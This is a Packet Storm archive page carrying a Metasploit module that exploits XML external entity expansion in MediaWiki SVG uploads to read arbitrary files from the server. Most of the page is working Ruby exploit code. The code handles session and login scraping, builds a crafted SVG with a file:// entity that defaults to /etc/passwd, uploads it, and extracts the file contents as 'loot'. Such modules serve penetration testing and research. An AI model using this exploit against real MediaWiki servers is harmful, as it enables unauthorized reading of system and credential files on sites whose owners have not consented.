exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MediaWiki SVG XML Entity Expansion Remote File Access

MediaWiki SVG XML Entity Expansion Remote File Access
Posted Sep 1, 2024
Authored by juan vazquez, Christian Mehlmauer, Daniel Franke | Site metasploit.com

This Metasploit module attempts to read a remote file from the server using a vulnerability in the way MediaWiki handles SVG files. The vulnerability occurs while trying to expand external entities with the SYSTEM identifier. In order to work MediaWiki must be configured to accept upload of SVG files. If anonymous uploads are allowed the username and password arent required, otherwise they are. This Metasploit module has been tested successfully on MediaWiki 1.19.4, 1.20.3 on Ubuntu 10.04 and Ubuntu 12.10. Older versions were also tested but do not seem to be vulnerable to this vulnerability. The following MediaWiki requirements must be met: File upload must be enabled, $wgFileExtensions[] must include svg, $wgSVGConverter must be set to something other than false.

tags | exploit, remote, file upload
systems | linux, ubuntu
SHA-256 | 71615d7c455fb2156a5414c500e8bff8843420ced30f06fff70abbf96f287ac8

MediaWiki SVG XML Entity Expansion Remote File Access

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner

def initialize
super(
'Name' => 'MediaWiki SVG XML Entity Expansion Remote File Access',
'Description' => %q{
This module attempts to read a remote file from the server using a vulnerability
in the way MediaWiki handles SVG files. The vulnerability occurs while trying to
expand external entities with the SYSTEM identifier. In order to work MediaWiki must
be configured to accept upload of SVG files. If anonymous uploads are allowed the
username and password aren't required, otherwise they are. This module has been
tested successfully on MediaWiki 1.19.4, 1.20.3 on Ubuntu 10.04 and Ubuntu 12.10.
Older versions were also tested but do not seem to be vulnerable to this vulnerability.
The following MediaWiki requirements must be met: File upload must be enabled,
$wgFileExtensions[] must include 'svg', $wgSVGConverter must be set to something
other than 'false'.
},
'References' =>
[
[ 'OSVDB', '92490' ],
[ 'URL', 'https://phabricator.wikimedia.org/T48859' ],
[ 'URL', 'https://web.archive.org/web/20130421060020/http://www.gossamer-threads.com/lists/wiki/mediawiki-announce/350229']
],
'Author' =>
[
'Daniel Franke', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'Christian Mehlmauer' # Metasploit module
],
'License' => MSF_LICENSE
)

register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Path to MediaWiki', '/mediawiki']),
OptString.new('RFILE', [true, 'Remote File', '/etc/passwd']),
OptString.new('USERNAME', [ false, "The user to authenticate as"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with" ])
])

register_autofilter_ports([ 80 ])
end

def get_first_session
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php"),
'method' => 'GET',
'vars_get' => {
"title" => "Special:UserLogin",
"returnto" => "Main+Page"
}
})

if res && res.code == 200 && res.get_cookies =~ /([^\s]*session)=([a-z0-9]+)/
return $1,$2
else
return nil
end
end

def get_login_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php"),
'method' => 'GET',
'vars_get' => {
"title" => "Special:UserLogin",
"returnto" => "Main+Page"
},
'cookie' => session_cookie
})

if res and res.code == 200 and res.body =~ /name="wpLoginToken" value="([a-f0-9]*)"/
return $1
else
return nil
end

end

def parse_auth_cookie(cookies)
cookies.split(";").each do |part|
case part
when /([^\s]*UserID)=(.*)/
@wiki_user_id_name = $1
@wiki_user_id = $2
when /([^\s]*UserName)=(.*)/
@wiki_user_name_name = $1
@wiki_user_name = $2
when /session=(.*)/
@wiki_session = $1
else
next
end
end
end

def session_cookie
if @user and @password
return "#{@wiki_session_name}=#{@wiki_session}; #{@wiki_user_id_name}=#{@wiki_user_id}; #{@wiki_user_name_name}=#{@wiki_user_name}"
else
return "#{@wiki_session_name}=#{@wiki_session}"
end
end

def authenticate
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php"),
'method' => 'POST',
'vars_get' => {
"title" => "Special:UserLogin",
"action" => "submitlogin",
"type" => "login"
},
'vars_post' => {
"wpName" => datastore['USERNAME'],
"wpPassword" => datastore['PASSWORD'],
"wpLoginAttempt" => "Log+in",
"wpLoginToken" => @login_token,
"returnto" => "Main+Page"
},
'cookie' => session_cookie
})

if res and res.code == 302 and res.get_cookies.include?('UserID=')
parse_auth_cookie(res.get_cookies)
return true
else
return false
end
end

def get_edit_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php", "Special:Upload"),
'method' => 'GET',
'cookie' => session_cookie
})

if res and res.code == 200 and res.body =~/<title>Upload file/ and res.body =~ /<input id="wpEditToken" type="hidden" value="([0-9a-f]*)\+\\" name="wpEditToken" \/>/
return $1
else
return nil
end

end

def upload_file
entity = Rex::Text.rand_text_alpha_lower(3)
@file_name = Rex::Text.rand_text_alpha_lower(4)
svg_file = %Q|
<!DOCTYPE svg [<!ENTITY #{entity} SYSTEM "file://#{datastore['RFILE']}">]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
<desc>&#{entity};</desc>
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:1;stroke:rgb(0,0,0)" />
</svg>
|
svg_file.gsub!(/\t\t/, "")

post_data = Rex::MIME::Message.new
post_data.add_part(svg_file, "image/svg+xml", nil, "form-data; name=\"wpUploadFile\"; filename=\"#{@file_name}.svg\"")
post_data.add_part("#{@file_name.capitalize}.svg", nil, nil, "form-data; name=\"wpDestFile\"")
post_data.add_part("", nil, nil, "form-data; name=\"wpUploadDescription\"")
post_data.add_part("", nil, nil, "form-data; name=\"wpLicense\"")
post_data.add_part("#{@edit_token}+\\", nil, nil, "form-data; name=\"wpEditToken\"")
post_data.add_part("Special:Upload", nil, nil, "form-data; name=\"title\"")
post_data.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"")
post_data.add_part("Upload file", nil, nil, "form-data; name=\"wpUpload\"")

data = post_data.to_s

res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php", "Special:Upload"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => session_cookie
})

if res and res.code == 302 and res.headers['Location']
return res.headers['Location']
else
# try to output the errormessage
if res and res.body
error = res.body.scan(/<div class="error">(.*?)<\/div>/m)[0]
if error and error.size == 1
vprint_error(error[0])
end
end
return nil
end
end

def read_data
res = send_request_cgi({
'uri' => @svg_uri,
'method' => 'GET',
'cookie' => session_cookie
})

if res and res.code == 200 and res.body =~ /File:#{@file_name.capitalize}.svg/ and res.body =~ /Metadata/ and res.body =~ /<th>Image title<\/th>\n<td>(.*)<\/td>\n<\/tr><\/table>/m
return $1
else
return nil
end
end

def accessfile(rhost)
vprint_status("#{peer} MediaWiki - Getting unauthenticated session...")
@wiki_session_name, @wiki_session = get_first_session
if @wiki_session.nil?
print_error("#{peer} MediaWiki - Failed to get unauthenticated session...")
return
end
vprint_status("#{peer} Sessioncookie: #{@wiki_session_name}=#{@wiki_session}")

if @user and not @user.empty? and @password and not @password.empty?
vprint_status("#{peer} MediaWiki - Getting login token...")
@login_token = get_login_token
if @login_token.nil?
print_error("#{peer} MediaWiki - Failed to get login token")
return
end
vprint_status("#{peer} Logintoken: #{@login_token}")

if not authenticate
print_error("#{peer} MediaWiki - Failed to authenticate")
return
end
vprint_status("#{peer} Userid cookie: #{@wiki_user_id_name}=#{@wiki_user_id}")
vprint_status("#{peer} Username cookie: #{@wiki_user_name_name}=#{@wiki_user_name}")
vprint_status("#{peer} Session cookie: #{@wiki_session_name}=#{@wiki_session}")
end

vprint_status("#{peer} MediaWiki - Getting edit token...")
@edit_token = get_edit_token
if @edit_token.nil?
print_error("#{peer} MediaWiki - Failed to get edit token")
return
end
vprint_status("#{peer} Edittoken: #{@edit_token}")

vprint_status("#{peer} MediaWiki - Uploading SVG file...")
@svg_uri = upload_file
if @svg_uri.nil?
print_error("#{peer} MediaWiki - Failed to upload SVG file")
return
end
vprint_status("#{peer} SVG URI: #{@svg_uri}")

vprint_status("#{peer} MediaWiki - Retrieving remote file...")
loot = read_data
if loot.nil? or loot.empty?
print_error("#{peer} MediaWiki - Failed to retrieve remote file")
return
end

f = ::File.basename(datastore['RFILE'])
path = store_loot('mediawiki.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_good("#{peer} MediaWiki - #{datastore['RFILE']} saved in #{path}")
end

def run
@user = datastore['USERNAME']
@password = datastore['USERNAME']
super
end

def run_host(ip)
accessfile(ip)
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close